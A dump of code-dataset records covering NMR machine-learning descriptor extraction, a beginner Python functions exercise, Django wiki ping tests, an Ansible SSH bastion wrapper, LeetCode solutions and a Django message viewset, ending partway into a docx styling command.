data_c.append(datapoint)\n\n\n # define metadata to be added to the ML input\n extension = [\n \"# nat: {}\".format(nat),\n \"# n_nmr_nuc: {}\".format(len(nmr_nuc)),\n \"# ref_h: {}\".format(ref_shield['H']),\n \"# ref_c: {}\".format(ref_shield['C'])\n ]\n\n return data_h, data_c, \"\\n\".join(extension)\n\n\n# shuffles a datalist in optional groups of atoms (=no groups), structures or compounds\n# datalist is a list of DataPointH and DataPointC objects\ndef shuffle_data(datalist, compounds, structures, mode='structures'):\n\n if mode == 'atoms':\n new_datalist = copy.deepcopy(datalist)\n random.Random(random_seed).shuffle(new_datalist)\n\n if mode == 'structures':\n metalist = []\n for comp in compounds:\n for struct in structures[comp]:\n tmp = []\n for data in datalist:\n if int(data.name[:dc]) == comp and int(data.name[-ds:]) == struct: tmp.append(data)\n metalist.append(tmp)\n 
random.Random(random_seed).shuffle(metalist)\n # the following combines lists in a list to one list (e.g. [[1,2],[3,4]] -> [1,2,3,4])\n new_datalist = [i for j in metalist for i in j]\n\n if mode == 'compounds':\n metalist = []\n for comp in compounds:\n tmp = []\n for data in datalist:\n if int(data.name[:dc]) == comp: tmp.append(data)\n metalist.append(tmp)\n random.Random(random_seed).shuffle(metalist)\n # the following combines lists in a list to one list (e.g. [[1,2],[3,4]] -> [1,2,3,4])\n new_datalist = [i for j in metalist for i in j]\n\n return new_datalist\n\n\n# Write full 1H/13C data from datalist into a file used as input for 1H/13C ML correction\n# mode can be 'H' or 'C' for 1H or 13C data; is_dataset is True for ML dataset or False for a sample molecule\n# additionally add an extension at the end of the file\n# (this is useful for a sample compound, where the dataset is a list of only one compound, to provide information for the ML script)\n# ATTENTION: This only gives reasonable output if datalist is purely H or purely C!\ndef write_ml_input(datalist, outpath, outname, extension=\"\", is_sample=False):\n\n atnums = \"# atom_numbers:\"\n printout = datalist[0].get_header()\n for data in datalist:\n printout.append(data.get_printout())\n if is_sample: atnums += \" \" + str(data.atom)\n if is_sample: printout.append(atnums)\n\n with open(os.path.join(outpath, outname), 'w') as out:\n out.write(\"\\n\".join(printout) + \"\\n\")\n out.write(extension)\n\n\nclass DataPoint:\n\n def __init__(self, name, atom, print_names=False):\n self.name = name\n self.atom = atom\n self.print_names = print_names\n self.include_acsf = False\n self.include_soap = False\n\n def set_attr_general(\n self, shielding_low,\n atomic_charge_mulliken, atomic_charge_loewdin,\n orbital_charge_mulliken_s, orbital_charge_loewdin_s,\n orbital_charge_mulliken_p, orbital_charge_loewdin_p,\n mayer_valence_total,\n shielding_diamagnetic, shielding_paramagnetic,\n span, skew, asymmetry, anisotropy,\n shielding_cc_3z=None, shielding_dft_3z=None, shielding_dft_4z=None, shielding_dft_5z=None\n ):\n self.shielding_low = shielding_low\n self.atomic_charge_mulliken = atomic_charge_mulliken\n self.atomic_charge_loewdin = atomic_charge_loewdin\n self.orbital_charge_mulliken_s = orbital_charge_mulliken_s\n self.orbital_charge_loewdin_s = orbital_charge_loewdin_s\n self.orbital_charge_mulliken_p = orbital_charge_mulliken_p\n self.orbital_charge_loewdin_p = orbital_charge_loewdin_p\n self.mayer_valence_total = mayer_valence_total\n self.shielding_diamagnetic = shielding_diamagnetic\n self.shielding_paramagnetic = shielding_paramagnetic\n self.span = span\n self.skew = skew\n self.asymmetry = asymmetry\n self.anisotropy = anisotropy\n self.shielding_cc_3z = shielding_cc_3z\n self.shielding_dft_3z = shielding_dft_3z\n self.shielding_dft_4z = shielding_dft_4z\n self.shielding_dft_5z = shielding_dft_5z\n if None in [self.shielding_cc_3z, self.shielding_dft_3z, self.shielding_dft_4z, self.shielding_dft_5z]:\n self.shielding_cc_ext = None\n else:\n self.shielding_cc_ext = extrapolate(self.shielding_cc_3z, self.shielding_dft_3z, self.shielding_dft_4z, self.shielding_dft_5z)\n\n def set_acsf(self, acsf_data):\n self.include_acsf = True\n self.acsf_data = acsf_data\n\n def set_soap(self, soap_data):\n self.include_soap = True\n self.soap_data = soap_data\n\n\nclass DataPointH(DataPoint):\n\n def set_attr_special(\n self, refshielding_low, shift_neighbor,\n cn_d3, number_hch, number_hyx,\n distance_hc, bond_order_loewdin, 
bond_order_mayer,\n refshielding_cc_ext=None\n ):\n self.element = 'H'\n self.shift_low = refshielding_low - self.shielding_low\n self.shift_neighbor = shift_neighbor\n self.cn_d3 = cn_d3\n self.number_hch = number_hch\n self.number_hyx = number_hyx\n self.distance_hc = distance_hc\n self.bond_order_loewdin = bond_order_loewdin\n self.bond_order_mayer = bond_order_mayer\n if refshielding_cc_ext is None:\n self.shift_cc_ext = self.deviation = None\n else:\n self.shift_cc_ext = refshielding_cc_ext - self.shielding_cc_ext\n self.deviation = self.shift_cc_ext - self.shift_low\n\n\n def get_header(self):\n\n nvar = 25\n if self.print_names: nvar += 3\n if self.include_acsf: nvar += len(descriptors.acsf_labels)\n if self.include_soap: nvar += len(descriptors.soap_labels_reduced)\n\n header_1 = \"# \" + \" \".join([str(i) for i in range(nvar)])\n header_2 = \"# shift_high-low shift_low CN(X) no_HCH no_HYH no_HYC no_HYN no_HYO dist_HC shift_low_neighbor_C shielding_dia shielding_para span skew asymmetry anisotropy at_charge_mull at_charge_loew orb_charge_mull_s orb_charge_mull_p orb_charge_loew_s orb_charge_loew_p BO_loew BO_mayer mayer_VA\"\n if self.print_names: header_2 = \"# compound structure atom\" + header_2[1:]\n if self.include_acsf: header_2 += \" \" + \" \".join(descriptors.acsf_labels)\n if self.include_soap: header_2 += \" \" + \" \".join(descriptors.soap_labels_reduced)\n\n return [header_1, header_2]\n\n\n def get_printout(self):\n\n if self.print_names:\n beginning = [self.name[:3], self.name[4:], self.atom]\n else:\n beginning = []\n\n line = (\n beginning\n + [self.deviation, self.shift_low, self.cn_d3, self.number_hch]\n + self.number_hyx\n + [\n self.distance_hc, self.shift_neighbor,\n self.shielding_diamagnetic, self.shielding_paramagnetic,\n self.span, self.skew, self.asymmetry, self.anisotropy,\n self.atomic_charge_mulliken, self.atomic_charge_loewdin,\n self.orbital_charge_mulliken_s, self.orbital_charge_mulliken_p,\n self.orbital_charge_loewdin_s, self.orbital_charge_loewdin_p,\n self.bond_order_loewdin, self.bond_order_mayer, self.mayer_valence_total\n ]\n )\n\n if self.include_acsf: line += [self.acsf_data[acsf_name] for acsf_name in descriptors.acsf_labels]\n if self.include_soap: line += [self.soap_data[soap_name] for soap_name in descriptors.soap_labels_reduced]\n\n return \" \".join([str(val) for val in line])\n\n\nclass DataPointC(DataPoint):\n\n def set_attr_special(\n self, refshielding_low, cn_d3, number_cx, number_cyx,\n orbital_charge_mulliken_d, orbital_charge_loewdin_d, orbital_stdev_mulliken_p, orbital_stdev_loewdin_p,\n bond_orders_loewdin_sum, bond_orders_mayer_sum, bond_orders_loewdin_av, bond_orders_mayer_av,\n refshielding_cc_ext=None\n ):\n self.element = 'C'\n self.shift_low = refshielding_low - self.shielding_low\n self.cn_d3 = cn_d3\n self.number_cx = number_cx\n self.number_cyx = number_cyx\n self.orbital_charge_mulliken_d = orbital_charge_mulliken_d\n self.orbital_charge_loewdin_d = orbital_charge_loewdin_d\n self.orbital_stdev_mulliken_p = orbital_stdev_mulliken_p\n self.orbital_stdev_loewdin_p = orbital_stdev_loewdin_p\n self.bond_orders_loewdin_sum = bond_orders_loewdin_sum\n self.bond_orders_mayer_sum = bond_orders_mayer_sum\n self.bond_orders_loewdin_av = bond_orders_loewdin_av\n self.bond_orders_mayer_av = bond_orders_mayer_av\n if refshielding_cc_ext is None:\n self.shift_cc_ext = self.deviation = None\n else:\n self.shift_cc_ext = refshielding_cc_ext - self.shielding_cc_ext\n self.deviation = self.shift_cc_ext - self.shift_low\n\n\n def 
get_header(self):\n\n nvar = 32\n if self.print_names: nvar += 3\n if self.include_acsf: nvar += len(descriptors.acsf_labels)\n if self.include_soap: nvar += len(descriptors.soap_labels_reduced)\n\n header_1 = \"# \" + \" \".join([str(i) for i in range(nvar)])\n header_2 = \"# shift_high-low shift_low CN(X) no_CH no_CC no_CN no_CO no_CYH no_CYC no_CYN no_CYO shielding_dia shielding_para span skew asymmetry anisotropy at_charge_mull at_charge_loew orb_charge_mull_s orb_charge_mull_p orb_charge_mull_d orb_stdev_mull_p orb_charge_loew_s orb_charge_loew_p orb_charge_loew_d orb_stdev_loew_p BO_loew_sum BO_loew_av BO_mayer_sum BO_mayer_av mayer_VA\"\n if self.print_names: header_2 = \"# compound structure atom\" + header_2[1:]\n if self.include_acsf: header_2 += \" \" + \" \".join(descriptors.acsf_labels)\n if self.include_soap: header_2 += \" \" + \" \".join(descriptors.soap_labels_reduced)\n\n return [header_1, header_2]\n\n\n def get_printout(self):\n\n if self.print_names:\n beginning = [self.name[:3], self.name[4:], self.atom]\n else:\n beginning = []\n\n line = (\n beginning\n + [self.deviation, self.shift_low, self.cn_d3]\n + self.number_cx + self.number_cyx\n + [\n self.shielding_diamagnetic, self.shielding_paramagnetic,\n self.span, self.skew, self.asymmetry, self.anisotropy,\n self.atomic_charge_mulliken, self.atomic_charge_loewdin,\n self.orbital_charge_mulliken_s, self.orbital_charge_mulliken_p, self.orbital_charge_mulliken_d, self.orbital_stdev_mulliken_p,\n self.orbital_charge_loewdin_s, self.orbital_charge_loewdin_p, self.orbital_charge_loewdin_d, self.orbital_stdev_loewdin_p,\n self.bond_orders_loewdin_sum, self.bond_orders_loewdin_av, self.bond_orders_mayer_sum, self.bond_orders_mayer_av,\n self.mayer_valence_total,\n ]\n )\n\n if self.include_acsf: line += [self.acsf_data[acsf_name] for acsf_name in descriptors.acsf_labels]\n if self.include_soap: line += [self.soap_data[soap_name] for soap_name in descriptors.soap_labels_reduced]\n\n return \" \".join([str(val) for val in line])\n\n\nif __name__ == \"__main__\":\n\n workdir = os.getcwd()\n\n # initialize some proper parser for the command line input\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--set', type=str, help='choose to extract data from the test set compounds; provide the path to the data set directory')\n parser.add_argument('-a', '--sample', nargs=3, help='choose to extract data from a sample compound; provide structure in .xyz format, an orca output file, and a data directory (path to the data of the desired reference compound)', metavar=('xyz', 'out', 'data'))\n parser.add_argument('-ar', '--sample_ref', nargs=3, help='choose to extract data from a sample compound with high-level reference shifts; provide structure in .xyz format, an orca output file, and a data directory (path to the data of the desired reference compound and the high-level reference data)', metavar=('xyz', 'out', 'data'))\n parser.add_argument('-fl', '--functional_low', default='pbe0', help='functional for low-level DFT NMR shift to be corrected, default: pbe0')\n parser.add_argument('-bl', '--basis_low', default='pcSseg-2', help='basis set for low-level DFT NMR shift to be corrected, default: pcSseg-2')\n parser.add_argument('-r', '--reference', default='tms', help='reference compound for NMR shift, default: tms')\n parser.add_argument('-s', '--shuffle', default='structures', choices=['none', 'atoms', 'structures', 'compounds'], help='shuffle mode for the data set: atoms, structures or compounds, default: structures')\n 
parser.add_argument('-rs', '--randomseed', type=int, default=0, help='random seed for data shuffling, default: 0')\n parser.add_argument('-pn', '--print_names', action='store_true', help='additionally print names (i.e. compound, structures, and atom numbers) in the data set file (only relevant for --set option)')\n parser.add_argument('-i', '--include', nargs='+', type=str.lower, choices=['acsf', 'soap'], help='optionally include ACSF and/or SOAP features')\n\n args = parser.parse_args()\n\n if args.set is not None:\n input_mode = 'set'\n datapath = args.set\n elif args.sample is not None:\n input_mode = 'sample'\n samplepath_xyz, samplepath_out, datapath = args.sample\n elif args.sample_ref is not None:\n input_mode = 'sample_ref'\n samplepath_xyz, samplepath_out, datapath = args.sample_ref\n else:\n print(\"ERROR: no input mode selected! Please select --set, --sample <str> or --sample_ref <str>\")\n exit()\n\n reference = args.reference\n # The settings for the reference and extrapolation methods are currently fixed\n functional_high = 'bhlyp'\n basis_3z = 'pcSseg-2'\n basis_4z = 'pcSseg-3'\n basis_5z = 'pcSseg-4'\n\n functional_low = args.functional_low\n basis_low = args.basis_low\n shuffle_mode = args.shuffle\n random_seed = args.randomseed\n print_names = args.print_names\n\n if args.include is None: include = []\n else: include = include = args.include\n\n # import the ACSF and SOAP routines within dscribe only when they are needed\n if any(i in include for i in ['acsf', 'soap']): import additional_descriptors as descriptors\n\n if input_mode == 'set':\n\n compounds = [c + 1 for c in range(100)] # compound numbers from 1 to 100\n structures = {}\n for comp in compounds: structures[comp] = [int(f) for f in sorted(os.listdir(os.path.join(datapath, str(comp).zfill(3))))]\n\n print(\"Extracting ML descriptors from the data set\\n\")\n print(\"Settings:\")\n print(\"Reference coupled-cluser calculation level: CCSD(T)/{}\".format(basis_3z))\n print(\"Functional for DFT CBS extrapolation : {}\".format(functional_high))\n print(\"Basis sets for DFT CBS extrapolation : {}, {}, {}\".format(basis_3z, basis_4z, basis_5z))\n print(\"Functional for low-level DFT calculation : {}\".format(functional_low))\n print(\"Basis set for low-level DFT calculation : {}\".format(basis_low))\n print(\"Reference compound : {}\".format(reference))\n print(\"Shuffle mode : {}\".format(shuffle_mode))\n print(\"Random seed for shuffling : {}\\n\".format(random_seed))\n\n high_level = {\n 'functional': functional_high,\n 'basis_3z': basis_3z,\n 'basis_4z': basis_4z,\n 'basis_5z': basis_5z\n }\n\n ref, ref_high = get_reference(datapath, reference, functional_low, basis_low, high_level)\n\n data_h = []\n data_c = []\n for comp in compounds:\n print(\"collecting data from compound {} ({} structures)\".format(comp, len(structures[comp])))\n for struct in structures[comp]:\n name = str(comp).zfill(dc) + '_' + str(struct).zfill(ds)\n structpath = os.path.join(datapath, str(comp).zfill(dc), str(struct).zfill(ds))\n path_xyz = os.path.join(structpath, functional_low, basis_low, name + '.xyz')\n path_out = os.path.join(structpath, functional_low, basis_low, 'orca.out')\n\n dath, datc, _ = get_data(path_xyz, path_out, name, ref, include, high_level, ref_high, structpath, print_names)\n data_h.extend(dath)\n data_c.extend(datc)\n \n n_structures = sum([len(v) for v in structures.values()])\n print(\"\\nAnalyzed a total number of:\")\n print(\"{} compounds\".format(len(compounds)))\n print(\"{} 
structures\".format(n_structures))\n print(\"{} 1H NMR shifts\".format(len(data_h)))\n print(\"{} 13C NMR shifts\".format(len(data_c)))\n\n # optionally shuffle the data (mode = 'structures' (default), 'compounds', 'atoms', 'none')\n if shuffle_mode == 'none':\n data_h_shuffled = data_h\n data_c_shuffled = data_c\n else:\n data_h_shuffled = shuffle_data(data_h, compounds, structures, mode=shuffle_mode)\n data_c_shuffled = shuffle_data(data_c, compounds, structures, mode=shuffle_mode)\n\n # add some method data to the end of the data set file\n extension_settings = [\n \"# high-level CC level : CCSD(T)/{}\".format(basis_3z),\n \"# functional for DFT CBS extrapolation: {}\".format(functional_high),\n \"# basis sets for DFT CBS extrapolation: {}, {}, {}\".format(basis_3z, basis_4z, basis_5z),\n \"# low-level functional (DFT) : {}\".format(functional_low),\n \"# low-level basis set (DFT) : {}\".format(basis_low),\n \"# NMR reference compound : {}\".format(reference),\n \"# shuffle mode : {}\".format(shuffle_mode),\n \"# random seed for shuffling : {}\\n\".format(random_seed)\n ]\n\n write_ml_input(data_h_shuffled, workdir, \"ml_\" + functional_low + \"_\" + basis_low + \"_h.dat\", extension=\"\\n\".join(extension_settings))\n write_ml_input(data_c_shuffled, workdir, \"ml_\" + functional_low + \"_\" + basis_low + \"_c.dat\", extension=\"\\n\".join(extension_settings))\n\n elif input_mode in ['sample', 'sample_ref']:\n\n # define a compound name (use .xyz file and delete .xyz if present)\n sample_name = os.path.abspath(samplepath_xyz).split(os.sep)[-1].replace('.xyz', '')\n\n print(\"Extracting ML descriptors from sample compound: {}\".format(sample_name))\n print(\"... using 3D structure provided in: {}\".format(os.path.abspath(samplepath_xyz)))\n print(\"... using ORCA calculation output in: {}\".format(os.path.abspath(samplepath_out)))\n print(\"... 
using supplementary data in: {}\\n\".format(os.path.abspath(datapath)))\n print(\"Settings:\")\n if input_mode == 'sample_ref':\n print(\"Reference coupled-cluser calculation level: CCSD(T)/{}\".format(basis_3z))\n print(\"Functional for DFT CBS extrapolation : {}\".format(functional_high))\n print(\"Basis sets for DFT CBS extrapolation : {}, {}, {}\".format(basis_3z, basis_4z, basis_5z))\n print(\"Functional for low-level DFT calculation : {}\".format(functional_low))\n print(\"Basis set for low-level DFT calculation : {}\".format(basis_low))\n print(\"Reference compound : {}\\n\".format(reference))\n elif input_mode == 'sample':\n print(\"Functional for low-level DFT calculation: {}\".format(functional_low))\n print(\"Basis set for low-level DFT calculation : {}\".format(basis_low))\n print(\"Reference compound : {}\\n\".format(reference))\n\n # get all the data\n if input_mode == 'sample_ref':\n high_level = {\n 'functional': functional_high,\n 'basis_3z': basis_3z,\n 'basis_4z': basis_4z,\n 'basis_5z': basis_5z\n }\n ref, ref_high = get_reference(datapath, reference, functional_low, basis_low, high_level)\n data_h, data_c, extension = get_data(samplepath_xyz, samplepath_out, sample_name, ref, include, high_level, ref_high, datapath)\n elif input_mode == 'sample':\n ref, ref_high = get_reference(datapath, reference, functional_low, basis_low)\n data_h, data_c, extension = get_data(samplepath_xyz, samplepath_out, sample_name, ref, include)\n\n print(\"\\nAnalyzed a total number of:\")\n print(\"{} 1H NMR shifts\".format(len(data_h)))\n print(\"{} 13C NMR shifts\".format(len(data_c)))\n\n # add some method data to the beginning of the extension\n extension_settings = [\n \"# low-level functional (DFT): {}\".format(functional_low),\n \"# low-level basis set (DFT): {}\".format(basis_low),\n \"# NMR reference compound: {}\".format(reference),\n ]\n if input_mode == 'sample_ref':\n extension_refsettings = [\n \"# high-level CC level: CCSD(T)/{}\".format(basis_3z),\n \"# functional for DFT CBS extrapolation: {}\".format(functional_high),\n \"# basis sets for DFT CBS extrapolation: {}, {}, {}\".format(basis_3z, basis_4z, basis_5z)\n ]\n extension_settings = extension_refsettings + extension_settings\n extension = \"\\n\".join(extension_settings) + \"\\n\" + extension + \"\\n\"\n\n if input_mode == 'sample_ref':\n write_ml_input(data_h, workdir, \"ml_\" + sample_name + \"_ref_h.dat\", extension=extension, is_sample=True)\n write_ml_input(data_c, workdir, \"ml_\" + sample_name + \"_ref_c.dat\", extension=extension, is_sample=True)\n else:\n write_ml_input(data_h, workdir, \"ml_\" + sample_name + \"_h.dat\", extension=extension, is_sample=True)\n write_ml_input(data_c, workdir, \"ml_\" + sample_name + \"_c.dat\", extension=extension, is_sample=True)\n\n","repo_name":"grimme-lab/ml4nmr","sub_path":"src/getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":55563,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"21234578285","text":"import math\n\ndef circArea(rad):\n area= math.pi * rad ** 2\n return area\n\ndef rectArea(length, width):\n area= length * width\n# **length and width are the parameters\n return area\n\ndef calcAverage(nums):\n # nums are the parameter\n total = 0\n for num in nums:\n total += num\n avg= total/ len(nums)\n return avg\n\n#VOID FUNCTION\ndef writeAverage(nums, filename):\n total = 0\n for num in nums:\n total += num\n avg= total/ len(nums)\n outfile = open(file, \"w\")\n print(avg, file= 
outfile)\n    outfile.close()\n    print(\"Data written to: \" + filename)\n\ndef changeList(values,value):\n    # parameters= values and value\n    values.append(value)\n    \n\ndef main():\n    print(\"Area if rad = 10 \" + str(circArea(10)))\n\n    area= circArea(3)\n    print(\"Area of rad= 3 \" + str(area))\n    \n    rArea = rectArea(3,5)\n    print(\"Area of l= 3, w= 5: \" + str(rArea))\n\n    rArea = rectArea(4,6)\n# ** argument 4,6 \n    print(\"Area of l= 4, w= 6: \" + str(rArea))\n\n    average= calcAverage([70, 80, 90, 100, 100])\n    print(\"Avg [70, 80, 90, 100, 100]: \"+ str(average))\n\n    writeAverage([3,5,7], \"avg.txt\")\n\n    names= [\"Alex\", \"Jayse\", \"Megan\"]\n    print(names)\n    changeList(names, \"Matt\")\n    # arguments are names and matt\n    print(names)\n    \nmain()\n","repo_name":"shefaliemmanuel/CSCI220PythonProgramming","sub_path":"Class Work 7.py","file_name":"Class Work 7.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29031946697","text":"\"\"\"\nADMIN-4537\n\"\"\"\nfrom inspect import getmembers, isclass\nfrom unittest import skipIf\n\nfrom django.conf import settings\n\nfrom wiki.ping.management.commands.ping import (\n    CriticalDatabaseError,\n    DatabaseError,\n    PingException,\n    WrongStatus,\n    check_databases,\n)\nfrom wiki.ping.management.commands.ping import validate as ping_validate\nfrom intranet.wiki.tests.wiki_tests.common.wiki_client import WikiClient\nfrom intranet.wiki.tests.wiki_tests.common.wiki_django_testcase import WikiDjangoTestCase\n\n\nclass FakeResponse(object):\n    status_code = 500\n    text = ''\n\n\nclass PingTest(WikiDjangoTestCase):\n    \"\"\"\n    Test for the /ping handler\n    \"\"\"\n\n    client_class = WikiClient\n\n    @skipIf(settings.IS_BUSINESS, 'wait for fixing for business')\n    def test_get(self):\n        response = self.client.get('/ping')\n\n        self.assertEqual(200, response.status_code)\n\n    def test_command_ping(self):\n        fake_resp = FakeResponse()\n\n        # incorrect http status\n        self.assertRaises(WrongStatus, ping_validate, fake_resp)\n\n        fake_resp.status_code = 200\n        self.assertEqual(None, ping_validate(fake_resp))\n\n    def test_exception_inheritance(self):\n        \"\"\"\n        All ping module exceptions are subclasses of PingException\n        \"\"\"\n        from wiki.ping.management.commands import ping, ping_celery\n\n        filt = lambda value: isclass(value) and value is not PingException and issubclass(value, Exception)\n\n        exceptions = getmembers(ping, filt)\n        exceptions.extend(getmembers(ping_celery, filt))\n\n        # all ping module exceptions are subclasses of PingException\n        for _, exc_class in exceptions:\n            self.assertTrue(issubclass(exc_class, PingException))\n\n    def test_check_databases(self):\n        ALIASES = ['default', 'slave']\n        from wiki.ping.management.commands import ping\n\n        _db_is_alive = ping.db_is_alive\n\n        def db_is_alive(db_name, cache_seconds=0, number_of_tries=1, force=False):\n            return db_name in ALIASES\n\n        try:\n            ping.db_is_alive = db_is_alive\n\n            self.assertEqual(None, check_databases(ALIASES))\n\n            self.assertRaises(CriticalDatabaseError, lambda: check_databases(['slow', 'slow2']))\n\n            self.assertRaises(DatabaseError, lambda: check_databases(['default', 'slow']))\n        finally:\n            ping.db_is_alive = _db_is_alive\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/wiki_tests/unit_unittest/ping/test_ping.py","file_name":"test_ping.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"70490502801","text":"#!/usr/bin/env python3\n\nimport getpass\nimport os\nimport sys\n\nfrom lib import find_executable, get_hostvars, get_var_within, manage_conf_file\n\n\ndef main():\n argv = list(sys.argv[1:]) # Copy\n\n bastion_user = None\n bastion_host = None\n bastion_port = None\n remote_user = None\n remote_port = 22\n default_configuration_file = \"/etc/ovh/bastion/config.yml\"\n\n cmd = argv.pop()\n host = argv.pop()\n\n # check if bastion_vars are passed as env vars in the playbook\n # may be usefull if the ansible controller manage many bastions\n # example :\n # - hosts: all\n # gather_facts: false\n # environment:\n # BASTION_USER: \"{{ bastion_user }}\"\n # BASTION_HOST: \"{{ bastion_host }}\"\n # BASTION_PORT: \"{{ bastion_port }}\"\n #\n # will result as : ... '/bin/sh -c '\"'\"'BASTION_USER=my_bastion_user BASTION_HOST=my_bastion_host BASTION_PORT=22 /usr/bin/python3 && sleep 0'\"'\"''\n for i in list(cmd.split(\" \")):\n if \"bastion_user\" in i.lower():\n bastion_user = i.split(\"=\")[1]\n elif \"bastion_host\" in i.lower():\n bastion_host = i.split(\"=\")[1]\n elif \"bastion_port\" in i.lower():\n bastion_port = i.split(\"=\")[1]\n\n # in some cases (AWX in a non containerised environment for instance), the environment is overridden by the job\n # so we are not able to get the BASTION vars\n # if some vars are still undefined, try to load them from a configuration file\n bastion_host, bastion_port, bastion_user = manage_conf_file(\n os.environ.get(\"BASTION_CONF_FILE\", default_configuration_file),\n bastion_host,\n bastion_port,\n bastion_user,\n )\n\n # lookup on the inventory may take some time, depending on the source, so use it only if not defined elsewhere\n # it seems like some module like template does not send env vars too...\n if not bastion_host or not bastion_port or not bastion_user:\n hostvar = get_hostvars(host) # dict\n\n bastion_port = get_var_within(\n hostvar.get(\"bastion_port\", os.environ.get(\"BASTION_PORT\", 22)), hostvar\n )\n bastion_user = get_var_within(\n hostvar.get(\n \"bastion_user\", os.environ.get(\"BASTION_USER\", getpass.getuser())\n ),\n hostvar,\n )\n bastion_host = get_var_within(\n hostvar.get(\"bastion_host\", os.environ.get(\"BASTION_HOST\")), hostvar\n )\n\n for i, e in enumerate(argv):\n\n if e.startswith(\"User=\"):\n remote_user = e.split(\"=\")[-1]\n argv[i] = \"User={}\".format(bastion_user)\n elif e.startswith(\"Port=\"):\n remote_port = e.split(\"=\")[-1]\n argv[i] = \"Port={}\".format(bastion_port)\n\n # syscall exec\n args = (\n [\n \"ssh\",\n \"-p\",\n bastion_port,\n \"-q\",\n \"-o\",\n \"StrictHostKeyChecking=no\",\n \"-l\",\n bastion_user,\n bastion_host,\n \"-T\",\n ]\n + argv\n + [\n \"--\",\n \"-q\",\n \"-T\",\n \"--never-escape\",\n \"--user\",\n remote_user,\n \"--port\",\n remote_port,\n host,\n \"--\",\n cmd,\n ]\n )\n os.execv(\n find_executable(\"ssh\"), # full path mandatory\n [str(e).strip() for e in args], # execv() arg 2 must contain only strings\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ovh/the-bastion-ansible-wrapper","sub_path":"sshwrapper.py","file_name":"sshwrapper.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"25507516853","text":"'''\nGiven two strings s and t, return true if s is a subsequence of t, or false otherwise.\nA subsequence of a string is a new string that is formed from the original string by deleting some (can be none) of the characters 
without disturbing the relative positions of the remaining characters. (i.e., \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n'''\nclass Solution:\n    def isSubsequence(self, s: str, t: str) -> bool:\n\n        # My solution\n        # would be to use a method that could look at the string s \n        # and then remove any character not in string s from string t \n        # if the new string t has the characters in string s then return true\n\n\n        newstring =''\n\n        for i in range(len(t)):\n            if (t[i] in s):\n                newstring += t[i]\n        if s == newstring or s in newstring:\n            return True\n        else: \n            return False\n        # Works for 17/18 test cases but not the last one\n\n\n\n        # Working solution \n        # We need to create 2 pointers to iterate through both strings\n        # first in the while loop, we go through all letters in string t (hence the j+=1)\n        # If the current character on string S is EQUAL to the character on string T\n        # THEN we will move onto the next character in S \n\n\nclass Solution:\n    def isSubsequence(self, s: str, t: str) -> bool:\n        # initialize the pointers \n        i =0 \n        j =0 \n\n        # going through the string with a while loop we want to go through all the characters of s and t \n        while i < len(s) and j <len(t):\n            # if the current character in s EQUALS to the current character in t, then add one to the i pointer\n            if s[i] == t[j]:\n                i += 1\n            # If it does equal or not, regardless we move onto the next character in t \n            j += 1\n\n        # if i == len(s):\n        #     return True \n        # else:\n        #     return False\n\n        # if i counter is == to the length of the s string then return true\n        return i==len(s)\n\n\n","repo_name":"Jonathan2025/Interview-Questions","sub_path":"questions/Leetcode-Questions/Level 1/Strings/is_subsequence.py","file_name":"is_subsequence.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8750890843","text":"# Create your views here.\nfrom django.db.models import Q\nfrom rest_framework.mixins import CreateModelMixin, ListModelMixin\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom app.chat.models import Message\nfrom app.chat.serializers import CreateMessageSerializer, ListMessageSerializer\n\n\nclass MessageViewSet(CreateModelMixin, ListModelMixin, GenericViewSet):\n\n    permission_classes = [\n        IsAuthenticated,\n    ]\n\n    serializer_class = ListMessageSerializer\n\n    def get_serializer_class(self):\n        cls = super().get_serializer_class()\n\n        if self.action in (\"create\",):\n            cls = CreateMessageSerializer\n        elif self.action == \"list\":\n            cls = ListMessageSerializer\n\n        return cls\n\n    def get_queryset(self):\n        user = self.request.user\n\n        return Message.objects.related_to_user(user)\n\n","repo_name":"akoikelov/binovate-test","sub_path":"app/chat/views/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39829560886","text":"# given an arr, return an array such that answer i is the number of days to get a higher num\n# no sorting \n# have a stack that only for decreasing number \n# for each num in temps: while stack.peek is < than current num: pop and update the count\n# add the tuple num and index into the stack/deque\nfrom collections import deque\n\nclass Solution(object):\n    def dailyTemperatures(self, temperatures):\n        \"\"\"\n        :type temperatures: List[int]\n        :rtype: List[int]\n        \"\"\"\n        stack = deque()\n        result = [0]*len(temperatures)\n        for index, num in 
enumerate(temperatures): \n            while stack and stack[-1][0]<num: \n                result[stack[-1][1]] = index - stack[-1][1]\n                stack.pop()\n            stack.append((num, index))\n        return result\n","repo_name":"MaTasty/Grind","sub_path":"dailyTemperatures.py","file_name":"dailyTemperatures.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4236981910","text":"\"\"\"Handler for the 'apply-styles' command\n(Commands are issued on the command line, per the docopt syntax in __main__.py)\n\"\"\"\n\n# Standard library\nimport os\n\n# Local\nfrom cascade import cmd_check\nfrom cascade.word_docx import WordDocx\nfrom cascade.util import get_directive_type\nfrom cascade.util import add_suffix_to_filename, make_output_file_info\nfrom cascade import quicklog\nfrom cascade.util_eliot import log_function\n\nqlog = quicklog.get_logger()\nlprint = qlog.lprint\n\n@log_function\ndef apply_styles(arguments):\n    \"\"\" Apply Cascade styles to all directives\n\n    Used to correct documents which were converted to Cascade format \n    before Cascade used styles for directives (it previously used \n    localized ad-hoc styling applied directly to the 